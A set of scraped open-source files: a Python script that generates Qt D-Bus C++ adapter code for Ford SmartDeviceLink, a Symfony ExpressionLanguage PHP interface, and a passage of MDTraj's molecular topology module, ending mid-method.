# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from argparse import ArgumentParser
import os.path
from sys import argv
from xml.etree import ElementTree
from copy import copy
from ford_xml_parser import FordXmlParser, ParamDesc
from code_formatter import CodeBlock
class Impl(FordXmlParser):
def args_for_function_definition(self, params, iface_name, out):
for param_el in params:
param = self.make_param_desc(param_el, iface_name)
out.write('QVariant %s,' % (param.name))
out.write('Q%sValue hmi_callback' % prefix_class_item)
def make_requests_for_header(self, out):
for interface_el in self.el_tree.findall('interface'):
request_responses = self.find_request_response_pairs_by_provider(interface_el, "sdl")
for (request, response) in request_responses:
all_params = list()
for param_el in request.findall('param'):
all_params.append(param_el)
with CodeBlock(out) as output:
output.write("Q_INVOKABLE bool %s_%s(" % (interface_el.get('name'), request.get('name')))
impl.args_for_function_definition(all_params, interface_el.get('name'), out)
output.write(");\n")
def make_header_file(self, out):
out.write("class QDBusInterface;\n")
out.write("class RequestToSDL : public QObject\n")
out.write("{\n")
out.write(' Q_OBJECT\n')
out.write(" public:\n")
with CodeBlock(out) as output:
output.write("explicit RequestToSDL(QObject *parent = 0);\n")
output.write("~RequestToSDL();\n")
impl.make_requests_for_header(out)
out.write(" private:\n")
with CodeBlock(out) as output:
for interface_el in self.el_tree.findall('interface'):
output.write('QDBusInterface *%s;\n' % interface_el.get('name'))
out.write("};\n")
def qt_param_type(self, param):
if not param.mandatory:
param_copy = copy(param)
param_copy.mandatory = True
return "OptionalArgument< " + self.qt_param_type(param_copy) + " >"
if param.array:
param_copy = copy(param)
param_copy.array = False
if param.type == 'String':
return "QStringList"
return "QList< " + self.qt_param_type(param_copy) + " >"
if param.type == 'Integer' or param.enum:
return 'int'
elif param.type == 'String':
return 'QString'
elif param.type == 'Boolean':
return 'bool'
elif param.type == 'Float':
return 'double'
elif param.struct:
return "_".join(param.fulltype)
else:
raise RuntimeError('Unknown type: ' + param.type)
def make_requests_for_source(self, out):
for interface_el in self.el_tree.findall('interface'):
request_responses = self.find_request_response_pairs_by_provider(interface_el, "sdl")
for (request, response) in request_responses:
request_name = request.get('name')
iface_name = interface_el.get('name')
request_full_name = iface_name + '_' + request_name
out.write('bool RequestToSDL::' + request_full_name + '(')
for param_el in request.findall('param'):
out.write('QVariant %s, ' % (param_el.get('name')))
out.write('Q%sValue hmi_callback) {\n' % prefix_class_item)
with CodeBlock(out) as output:
output.write('LOG4CXX_TRACE(logger_, "ENTER");\n')
output.write('QList<QVariant> args;\n')
for param_el in request.findall('param'):
param = self.make_param_desc(param_el, iface_name)
output.write('%s %s;\n' % (impl.qt_param_type(param), param.name + "_tmp"))
output.write('if (VariantToValue(%s, %s)) {\n' % (param.name, param.name + '_tmp'))
with CodeBlock(output) as out:
self.write_param_validation(param, param.name + "_tmp",
"\nLOG4CXX_ERROR(logger_, \"%s in %s out of bounds\");\nreturn false" % (param.name, request_full_name),
out)
out.write('args << QVariant::fromValue(%s);\n' % (param.name + '_tmp'))
output.write('} else {\n')
with CodeBlock(output) as out:
out.write('LOG4CXX_ERROR(logger_, "%s in %s is NOT valid");\n' % (param.name, request_full_name))
out.write('return false;\n')
out.write('}\n')
output.write('new requests::' + request_full_name + '(hmi_callback, ' + interface_el.get('name') + ' , args, '
+ '"' + request_name + '");\n')
output.write('LOG4CXX_TRACE(logger_, "EXIT");\n')
output.write('return true;\n')
out.write('}\n\n')
def write_param_validation(self, param, param_name, fail_statement, out, level=0):
if not param.mandatory and (param.restricted or param.restrictedArray or (param.struct and any(map(lambda x: x.restricted, self.structs[param.fulltype])))):
out.write("if (%s.presence) {\n" % param_name)
param_copy = copy(param)
param_copy.mandatory = True
with CodeBlock(out) as out:
self.write_param_validation(param_copy, param_name + ".val", fail_statement, out, level+1)
out.write("}\n")
elif param.array:
if param.minSize > 0:
out.write("if ({0}.count() < {1}) {{".format(param_name, param.minSize))
with CodeBlock(out) as out:
out.write("{0};\n".format(fail_statement))
out.write("}\n")
if param.maxSize != None:
out.write("if ({0}.count() > {1}) {{".format(param_name, param.maxSize))
with CodeBlock(out) as out:
out.write("{0};\n".format(fail_statement))
out.write("}\n")
if param.restricted:
out.write('for ({0}::const_iterator it_{2} = {1}.begin(); it_{2} != {1}.end(); ++it_{2}) {{\n'.format(self.qt_param_type(param), param_name, level))
with CodeBlock(out) as out:
param_copy = copy(param)
param_copy.array = False
self.write_param_validation(param_copy, "(*it_{0})".format(level), fail_statement, out, level+1)
out.write("}\n")
elif param.struct:
for p in self.structs[param.fulltype]:
self.write_param_validation(p, "{0}.{1}".format(param_name, p.name), fail_statement, out, level+1)
elif param.type == "Integer" or param.type == "Float":
conditions = []
if (param.minValue != None):
conditions.append("(%s < %s)" % (param_name, param.minValue))
if (param.maxValue != None):
conditions.append("(%s > %s)" % (param_name, param.maxValue))
if conditions:
out.write('if (%s) {' % ' || '.join(conditions))
with CodeBlock(out) as out:
out.write('%s;\n' % fail_statement)
out.write("}\n")
elif param.type == "String":
conditions = []
if (param.minLength > 0):
conditions.append("(%s.size() < %s)" % (param_name, param.minLength))
if (param.maxLength > 0):
conditions.append("(%s.size() > %s)" % (param_name, param.maxLength))
if conditions:
out.write('if (%s) {' % ' || '.join(conditions))
with CodeBlock(out) as out:
out.write('%s;\n' % (fail_statement))
out.write("}\n")
def make_source_file(self, out):
out.write('RequestToSDL::RequestToSDL(QObject *parent) {\n')
with CodeBlock(out) as output:
output.write('QDBusConnection bus = QDBusConnection::sessionBus();\n')
for interface_el in self.el_tree.findall('interface'):
iface_name = interface_el.get('name')
output.write(iface_name + ' = new QDBusInterface("com.ford.sdl.core", "/", "com.ford.sdl.core.' + iface_name + '", bus, this);\n')
out.write('}\n\n')
out.write('RequestToSDL::~RequestToSDL() {\n')
with CodeBlock(out) as output:
for interface_el in self.el_tree.findall('interface'):
iface_name = interface_el.get('name')
output.write(iface_name + '->deleteLater();\n')
output.write('this->deleteLater();\n')
out.write('}\n\n')
impl.make_requests_for_source(out)
arg_parser = ArgumentParser(description="Generator of Qt to QDbus C++ part")
arg_parser.add_argument('--infile', required=True, help="full name of input file, e.g. applink/src/components/interfaces/QT_HMI_API.xml")
arg_parser.add_argument('--version', required=False, help="Qt version 4.8.5 (default) or 5.1.0")
arg_parser.add_argument('--outdir', required=True, help="path to directory where output files request_to_sdl.h, request_to_sdl.cc will be saved")
args = arg_parser.parse_args()
if args.version == "4.8.5":
prefix_class_item = 'Script'
invoke_type_connection = 'Direct'
elif args.version == "5.1.0":
prefix_class_item = 'JS'
invoke_type_connection = 'BlockingQueued'
else:
prefix_class_item = 'JS'
invoke_type_connection = 'BlockingQueued'
header_name = 'request_to_sdl.h'
source_name = 'request_to_sdl.cc'
in_tree = ElementTree.parse(args.infile)
in_tree_root = in_tree.getroot()
impl = Impl(in_tree_root, 'com.ford.sdl.hmi')
header_out = open(args.outdir + '/' + header_name, "w")
source_out = open(args.outdir + '/' + source_name, "w")
header_out.write("// Warning! This file is generated by '%s'. Edit at your own risk.\n" % argv[0])
header_out.write("""
/*
Copyright (c) 2014, Ford Motor Company
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the Ford Motor Company nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
""")
header_out.write("#ifndef SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_REQUEST_TO_SDL_H_\n")
header_out.write("#define SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_REQUEST_TO_SDL_H_\n\n")
header_out.write("#include <QtCore/QObject>\n")
header_out.write("#include <QtCore/QVariant>\n")
header_out.write("#include <QtCore/QStringList>\n\n")
header_out.write('#include "qml_dbus.h"\n\n')
if args.version == "4.8.5":
header_out.write("#include <QtScript/QScriptValue>\n")
elif args.version == "5.1.0":
header_out.write("#include <QtQml/QJSValue>\n")
impl.make_header_file(header_out)
header_out.write("#endif // SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_REQUEST_TO_SDL_H_")
source_out.write("// Warning! This file is generated by '%s'. Edit at your own risk.\n" % argv[0])
source_out.write("""
/*
Copyright (c) 2014, Ford Motor Company
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the Ford Motor Company nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
""")
source_out.write('#include "request_to_sdl.h"\n')
source_out.write("#include <QtDBus/QDBusConnection>\n")
source_out.write("#include <QtDBus/QDBusInterface>\n")
source_out.write('#include "hmi_requests.h"\n')
source_out.write('#include "utils/logger.h"\n\n')
source_out.write('CREATE_LOGGERPTR_GLOBAL(logger_, "DBusPlugin")\n\n')
impl.make_source_file(source_out) | unknown | codeparrot/codeparrot-clean | ||
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Component\ExpressionLanguage;
/**
* @author Fabien Potencier <fabien@symfony.com>
*/
interface ExpressionFunctionProviderInterface
{
/**
* @return ExpressionFunction[]
*/
public function getFunctions(): array;
} | php | github | https://github.com/symfony/symfony | src/Symfony/Component/ExpressionLanguage/ExpressionFunctionProviderInterface.php |
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Peter Eastman, Robert McGibbon
# Contributors: Kyle A. Beauchamp
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
#
# Portions of this code originate from the OpenMM molecular simulation
# toolkit, copyright (c) 2012 Stanford University and Peter Eastman. Those
# portions are distributed under the following terms:
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS, CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
##############################################################################
##############################################################################
# Imports
##############################################################################
from __future__ import print_function, division
import os
import re
import numpy as np
import itertools
from mdtraj.core import element as elem
import xml.etree.ElementTree as etree
from mdtraj.utils import ilen, import_
##############################################################################
# Utilities
##############################################################################
def _topology_from_subset(topology, atom_indices):
"""Create a new topology that only contains the supplied indices
Note
----
This really should be a copy constructor (class method) on Topology,
but I want it to work on either the mdtraj topology OR the OpenMM
topology. An inplace version for the topology object we have here
is also available.
Parameters
----------
topology : topology
The base topology
atom_indices : list([int])
The indices of the atoms to keep
"""
newTopology = Topology()
old_atom_to_new_atom = {}
for chain in topology._chains:
newChain = newTopology.add_chain()
for residue in chain._residues:
resSeq = getattr(residue, 'resSeq', None) or residue.index
newResidue = newTopology.add_residue(residue.name, newChain, resSeq)
for atom in residue._atoms:
if atom.index in atom_indices:
newAtom = newTopology.add_atom(atom.name, atom.element, newResidue)
old_atom_to_new_atom[atom] = newAtom
bondsiter = topology.bonds
if not hasattr(bondsiter, '__iter__'):
bondsiter = bondsiter()
for atom1, atom2 in bondsiter:
try:
newTopology.add_bond(old_atom_to_new_atom[atom1],
old_atom_to_new_atom[atom2])
except KeyError:
pass
# we only put bonds into the new topology if both of their partners
# were indexed and thus HAVE a new atom
# Delete empty residues
for chain in newTopology._chains:
chain._residues = [r for r in chain._residues if len(r._atoms) > 0]
# Delete empty chains
newTopology._chains = [c for c in newTopology._chains if len(c._residues) > 0]
# Re-set the numAtoms and numResidues
newTopology._numAtoms = ilen(newTopology.atoms)
newTopology._numResidues = ilen(newTopology.residues)
return newTopology
##############################################################################
# Classes
##############################################################################
class Topology(object):
"""Topology stores the topological information about a system.
The structure of a Topology object is similar to that of a PDB file.
It consists of a set of Chains (often but not always corresponding to
polymer chains). Each Chain contains a set of Residues, and each Residue
contains a set of Atoms. In addition, the Topology stores a list of which
atom pairs are bonded to each other.
Atom and residue names should follow the PDB 3.0 nomenclature for all
molecules for which one exists.
Attributes
----------
chains : generator
Iterator over all Chains in the Topology.
residues : genetator
Iterator over all Residues in the Chain.
atoms : generator
Iterator over all Atoms in the Chain.
Examples
--------
>>> topology = md.load('example.pdb').topology
>>> print(topology)
<mdtraj.Topology with 1 chains, 3 residues, 22 atoms, 21 bonds at 0x105a98e90>
>>> table, bonds = topology.to_dataframe()
>>> print(table.head())
serial name element resSeq resName chainID
0 0 H1 H 0 CYS 0
1 1 CH3 C 0 CYS 0
2 2 H2 H 0 CYS 0
3 3 H3 H 0 CYS 0
4 4 C C 0 CYS 0
>>> # rename residue "CYS" to "CYSS"
>>> table[table['residue'] == 'CYS']['residue'] = 'CYSS'
>>> print(table.head())
serial name element resSeq resName chainID
0 0 H1 H 0 CYSS 0
1 1 CH3 C 0 CYSS 0
2 2 H2 H 0 CYSS 0
3 3 H3 H 0 CYSS 0
4 4 C C 0 CYSS 0
>>> t2 = md.Topology.from_dataframe(table, bonds)
"""
_standardBonds = {}
def __init__(self):
"""Create a new Topology object"""
self._chains = []
self._numResidues = 0
self._numAtoms = 0
self._bonds = []
self._atoms = []
self._residues = []
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return "<%s>" % (self._string_summary_basic())
def __repr__(self):
return "<%s at 0x%02x>" % (self._string_summary_basic(), id(self))
def _string_summary_basic(self):
return "mdtraj.Topology with %d chains, %d residues, %d atoms, %d bonds" % (self.n_chains, self.n_residues, self.n_atoms, len(self._bonds))
def copy(self):
"""Return a copy of the topology
Returns
-------
out : Topology
A copy of this topology
"""
out = Topology()
for chain in self.chains:
c = out.add_chain()
for residue in chain.residues:
r = out.add_residue(residue.name, c, residue.resSeq)
for atom in residue.atoms:
out.add_atom(atom.name, atom.element, r)
for a1, a2 in self.bonds:
out.add_bond(a1, a2)
return out
def __copy__(self, *args):
return self.copy()
def __deepcopy__(self, *args):
return self.copy()
def join(self, other):
"""Join two topologies together
Parameters
----------
other : Topology
Another topology object
Returns
-------
out : Topology
A joint topology, with all of the atoms/residues/chains/bonds
in each of the individual topologies
"""
if not isinstance(other, Topology):
raise ValueError('other must be an instance of Topology to join')
out = self.copy()
atom_mapping = {}
for chain in other.chains:
c = out.add_chain()
for residue in chain.residues:
r = out.add_residue(residue.name, c, residue.resSeq)
for atom in residue.atoms:
a = out.add_atom(atom.name, atom.element, r)
atom_mapping[atom] = a
for a1, a2 in other.bonds:
out.add_bond(atom_mapping[a1], atom_mapping[a2])
return out
def to_openmm(self):
"""Convert this topology into OpenMM topology
Returns
-------
topology : simtk.openmm.app.Topology
This topology, as an OpenMM topology
"""
app = import_('simtk.openmm.app')
out = app.Topology()
atom_mapping = {}
for chain in self.chains:
c = out.addChain()
for residue in chain.residues:
r = out.addResidue(residue.name, c)
for atom in residue.atoms:
a = out.addAtom(atom.name, app.Element.getBySymbol(atom.element.symbol), r)
atom_mapping[atom] = a
for a1, a2 in self.bonds:
out.addBond(atom_mapping[a1], atom_mapping[a2])
return out
@classmethod
def from_openmm(cls, value):
"""Create a mdtraj topology from an OpenMM topology
Parameters
----------
value : simtk.openmm.app.Topology
An OpenMM topology that you wish to convert to a
mdtraj topology.
"""
app = import_('simtk.openmm.app')
if not isinstance(value, app.Topology):
raise TypeError('value must be an OpenMM Topology. '
'You supplied a %s' % type(value))
out = cls()
atom_mapping = {}
for chain in value.chains():
c = out.add_chain()
for residue in chain.residues():
r = out.add_residue(residue.name, c)
for atom in residue.atoms():
a = out.add_atom(atom.name, elem.get_by_symbol(atom.element.symbol), r)
atom_mapping[atom] = a
for a1, a2 in value.bonds():
out.add_bond(atom_mapping[a1], atom_mapping[a2])
return out
def to_dataframe(self):
"""Convert this topology into a pandas dataframe
Returns
-------
atoms : pandas.DataFrame
The atoms in the topology, represented as a data frame.
bonds : np.ndarray
The bonds in this topology, represented as an n_bonds x 2 array
of the indices of the atoms involved in each bond.
"""
pd = import_('pandas')
data = []
for atom in self.atoms:
if atom.element is None:
element_symbol = ""
else:
element_symbol = atom.element.symbol
data.append((atom.index, atom.name, element_symbol,
atom.residue.resSeq, atom.residue.name,
atom.residue.chain.index))
atoms = pd.DataFrame(data, columns=["serial", "name", "element",
"resSeq", "resName", "chainID"])
atoms = atoms.set_index("serial")
bonds = np.array([(a.index, b.index) for (a, b) in self.bonds])
return atoms, bonds
@classmethod
def from_dataframe(cls, atoms, bonds=None):
"""Create a mdtraj topology from a pandas data frame
Parameters
----------
atoms : pandas.DataFrame
The atoms in the topology, represented as a data frame. This data
frame should have columns "serial" (atom index), "name" (atom name),
"element" (atom's element), "resSeq" (index of the residue)
"resName" (name of the residue), "chainID" (index of the chain),
following the same conventions as wwPDB 3.0 format.
bonds : np.ndarray, shape=(n_bonds, 2), dtype=int, optional
The bonds in the topology, represented as an n_bonds x 2 array
of the indices of the atoms involved in each bond. Specifiying
bonds here is optional. To create standard protein bonds, you can
use `create_standard_bonds` to "fill in" the bonds on your newly
created Topology object
See Also
--------
create_standard_bonds
"""
pd = import_('pandas')
for col in ["name", "element", "resSeq" , "resName", "chainID"]:
if col not in atoms.columns:
raise ValueError('dataframe must have column %s' % col)
out = cls()
if not isinstance(atoms, pd.DataFrame):
raise TypeError('atoms must be an instance of pandas.DataFrame. '
'You supplied a %s' % type(atoms))
if not isinstance(bonds, np.ndarray):
raise TypeError('bonds must be an instance of numpy.ndarray. '
'You supplied a %s' % type(bonds))
if not np.all(np.arange(len(atoms)) == atoms.index):
raise ValueError('atoms must be uniquely numbered starting from zero.')
out._atoms = [None for i in range(len(atoms))]
for ci in np.unique(atoms['chainID']):
chain_atoms = atoms[atoms['chainID'] == ci]
c = out.add_chain()
for ri in np.unique(chain_atoms['resSeq']):
residue_atoms = chain_atoms[chain_atoms['resSeq'] == ri]
rnames = residue_atoms['resName']
residue_name = np.array(rnames)[0]
if not np.all(rnames == residue_name):
raise ValueError('All of the atoms with residue index %d do not share the same residue name' % ri)
r = out.add_residue(residue_name, c, ri)
for ai, atom in residue_atoms.iterrows():
if atom['element'] == "":
element = None
else:
element = elem.get_by_symbol(atom['element'])
a = Atom(atom['name'], element, ai, r)
out._atoms[ai] = a
r._atoms.append(a)
if bonds is not None:
for ai1, ai2 in bonds:
out.add_bond(out.atom(ai1), out.atom(ai2))
out._numAtoms = out.n_atoms
return out
def __eq__(self, other):
"""Are two topologies equal?
Parameters
----------
other : object
The object to compare to
Returns
-------
equality : bool
Are the two topologies identical?
"""
if not isinstance(other, Topology):
return False
if self is other:
return True
if len(self._chains) != len(other._chains):
return False
for c1, c2 in zip(self.chains, other.chains):
if c1.index != c2.index:
return False
if len(c1._residues) != len(c2._residues):
return False
for r1, r2 in zip(c1.residues, c2.residues):
if (r1.index != r1.index) or (r1.name != r2.name): # or (r1.resSeq != r2.resSeq):
return False
if len(r1._atoms) != len(r2._atoms):
return False
for a1, a2 in zip(r1.atoms, r2.atoms):
if (a1.index != a2.index) or (a1.name != a2.name):
return False
if a1.element is not None and a2.element is not None:
if a1.element != a2.element:
return False
#for attr in ['atomic_number', 'name', 'symbol']:
# if getattr(a1.element, attr) != getattr(a2.element, attr):
# return False
if len(self._bonds) != len(other._bonds):
return False
# the bond ordering is somewhat ambiguous, so try and fix it for comparison
self_sorted_bonds = sorted([(a1.index, b1.index) for (a1, b1) in self.bonds])
other_sorted_bonds = sorted([(a2.index, b2.index) for (a2, b2) in other.bonds])
for i in range(len(self._bonds)):
(a1, b1) = self_sorted_bonds[i]
(a2, b2) = other_sorted_bonds[i]
if (a1 != a2) or (b1 != b2):
return False
return True
def add_chain(self):
"""Create a new Chain and add it to the Topology.
Returns
-------
chain : mdtraj.topology.Chain
the newly created Chain
"""
chain = Chain(len(self._chains), self)
self._chains.append(chain)
return chain
def add_residue(self, name, chain, resSeq=None):
"""Create a new Residue and add it to the Topology.
Parameters
----------
name : str
The name of the residue to add
chain : mdtraj.topology.Chain
The Chain to add it to
resSeq : int, optional
Residue sequence number, such as from a PDB record. These sequence
numbers are arbitrary, and do not necessarily start at 0 (or 1).
If not supplied, the resSeq attribute will be set to the
residue's sequential (0 based) index.
Returns
-------
residue : mdtraj.topology.Residue
The newly created Residue
"""
if resSeq is None:
resSeq = self._numResidues
residue = Residue(name, self._numResidues, chain, resSeq)
self._residues.append(residue)
self._numResidues += 1
chain._residues.append(residue)
return residue
def add_atom(self, name, element, residue):
"""Create a new Atom and add it to the Topology.
Parameters
----------
name : str
The name of the atom to add
element : mdtraj.element.Element
The element of the atom to add
residue : mdtraj.topology.Residue
The Residue to add it to
Returns
-------
atom : mdtraj.topology.Atom
the newly created Atom
"""
atom = Atom(name, element, self._numAtoms, residue)
self._atoms.append(atom)
self._numAtoms += 1
residue._atoms.append(atom)
return atom
def add_bond(self, atom1, atom2):
"""Create a new bond and add it to the Topology.
Parameters
----------
atom1 : mdtraj.topology.Atom
The first Atom connected by the bond
atom2 : mdtraj.topology.Atom
The second Atom connected by the bond
"""
if atom1.index < atom2.index:
self._bonds.append((atom1, atom2))
else:
self._bonds.append((atom2, atom1))
def chain(self, index):
"""Get a specific chain by index. These indices
start from zero.
Returns
-------
chain : Chain
The `index`-th chain in the topology.
"""
return self._chains[index]
@property
def chains(self):
"""Iterator over all Chains in the Topology.
Returns
-------
chainiter : listiterator
Iterator over all Chains in the Topology.
"""
return iter(self._chains)
@property
def n_chains(self):
"""Get the number of chains in the Topology"""
return len(self._chains)
def residue(self, index):
"""Get a specific residue by index. These indices
start from zero.
Returns
-------
residue : Residue
The `index`-th residue in the topology.
"""
return self._residues[index]
@property
def residues(self):
"""Iterator over all Residues in the Topology.
Returns
-------
residueiter : generator
Iterator over all Residues in the Topology.
"""
for chain in self._chains:
for residue in chain._residues:
yield residue
@property
def n_residues(self):
"""Get the number of residues in the Topology"""
return len(self._residues)
def atom(self, index):
"""Get a specific atom by index. These indices
start from zero.
Returns
-------
atom : Atom
The `index`-th atom in the topology.
"""
return self._atoms[index]
@property
def atoms(self):
"""Iterator over all Atoms in the Topology.
Returns
-------
atomiter : generator
Iterator over all Atoms in the Topology.
"""
for chain in self._chains:
for residue in chain._residues:
for atom in residue._atoms:
yield atom
@property
def n_atoms(self):
"""Get the number of atoms in the Topology"""
return len(self._atoms)
@property
def bonds(self):
"""Iterator over all bonds (each represented as a tuple of two Atoms) in the Topology.
Returns
-------
atomiter : generator
Iterator over all tuple of Atoms in the Trajectory involved in a bond.
"""
return iter(self._bonds)
def create_standard_bonds(self):
"""Create bonds based on the atom and residue names for all standard residue types.
"""
if len(Topology._standardBonds) == 0:
# Load the standard bond defitions.
tree = etree.parse(os.path.join(os.path.dirname(__file__), '..', 'formats', 'pdb', 'data', 'residues.xml'))
for residue in tree.getroot().findall('Residue'):
bonds = []
Topology._standardBonds[residue.attrib['name']] = bonds
for bond in residue.findall('Bond'):
bonds.append((bond.attrib['from'], bond.attrib['to']))
for chain in self._chains:
# First build a map of atom names to atoms.
atomMaps = []
for residue in chain._residues:
atomMap = {}
atomMaps.append(atomMap)
for atom in residue._atoms:
atomMap[atom.name] = atom
# Loop over residues and construct bonds.
for i in range(len(chain._residues)):
name = chain._residues[i].name
if name in Topology._standardBonds:
for bond in Topology._standardBonds[name]:
if bond[0].startswith('-') and i > 0:
fromResidue = i-1
fromAtom = bond[0][1:]
elif bond[0].startswith('+') and i <len(chain._residues):
fromResidue = i+1
fromAtom = bond[0][1:]
else:
fromResidue = i
fromAtom = bond[0]
if bond[1].startswith('-') and i > 0:
toResidue = i-1
toAtom = bond[1][1:]
elif bond[1].startswith('+') and i <len(chain._residues):
toResidue = i+1
toAtom = bond[1][1:]
else:
toResidue = i
toAtom = bond[1]
if fromAtom in atomMaps[fromResidue] and toAtom in atomMaps[toResidue]:
self.add_bond(atomMaps[fromResidue][fromAtom], atomMaps[toResidue][toAtom])
def create_disulfide_bonds(self, positions):
"""Identify disulfide bonds based on proximity and add them to the Topology.
Parameters
----------
positions : list
The list of atomic positions based on which to identify bonded atoms
"""
def isCyx(res):
names = [atom.name for atom in res._atoms]
return 'SG' in names and 'HG' not in names
cyx = [res for res in self.residues if res.name == 'CYS' and isCyx(res)]
atomNames = [[atom.name for atom in res._atoms] for res in cyx]
for i in range(len(cyx)):
sg1 = cyx[i]._atoms[atomNames[i].index('SG')]
pos1 = positions[sg1.index]
for j in range(i):
sg2 = cyx[j]._atoms[atomNames[j].index('SG')]
pos2 = positions[sg2.index]
delta = [x-y for (x,y) in zip(pos1, pos2)]
distance = np.sqrt(delta[0]*delta[0] + delta[1]*delta[1] + delta[2]*delta[2])
if distance < 0.3: # this is supposed to be nm. I think we're good
self.add_bond(sg1, sg2)
def subset(self, atom_indices):
"""Create a new Topology from a subset of the atoms in an existing topology.
Notes
-----
The existing topology will not be altered.
Parameters
----------
atom_indices array_like
A list of the indices corresponding to the atoms in that you'd
like to retain.
"""
return _topology_from_subset(self, atom_indices)
class Chain(object):
"""A Chain object represents a chain within a Topology.
Attributes
----------
index : int
The index of the Chain within its Topology
topology : mdtraj.Topology
The Topology this Chain belongs to
residues : genetator
Iterator over all Residues in the Chain.
atoms : generator
Iterator over all Atoms in the Chain.
"""
def __init__(self, index, topology):
"""Construct a new Chain. You should call add_chain() on the Topology instead of calling this directly."""
## The index of the Chain within its Topology
self.index = index
## The Topology this Chain belongs to
self.topology = topology
self._residues = []
@property
def residues(self):
"""Iterator over all Residues in the Chain.
Returns
-------
residueiter : listiterator
Iterator over all Residues in the Topology.
"""
return iter(self._residues)
def residue(self, index):
"""Get a specific residue in this Chain
Returns
-------
residue : Residue
"""
return self._residue[index]
@property
def n_residues(self):
"Get the number of residues in this Chain"
return len(self._residues)
@property
def atoms(self):
"""Iterator over all Atoms in the Chain.
Returns
-------
atomiter : generator
Iterator over all Atoms in the Chain.
"""
for residue in self._residues:
for atom in residue._atoms:
yield atom
def atom(self, index):
"""Get a specific atom in this Chain
Returns
-------
atom : Atom
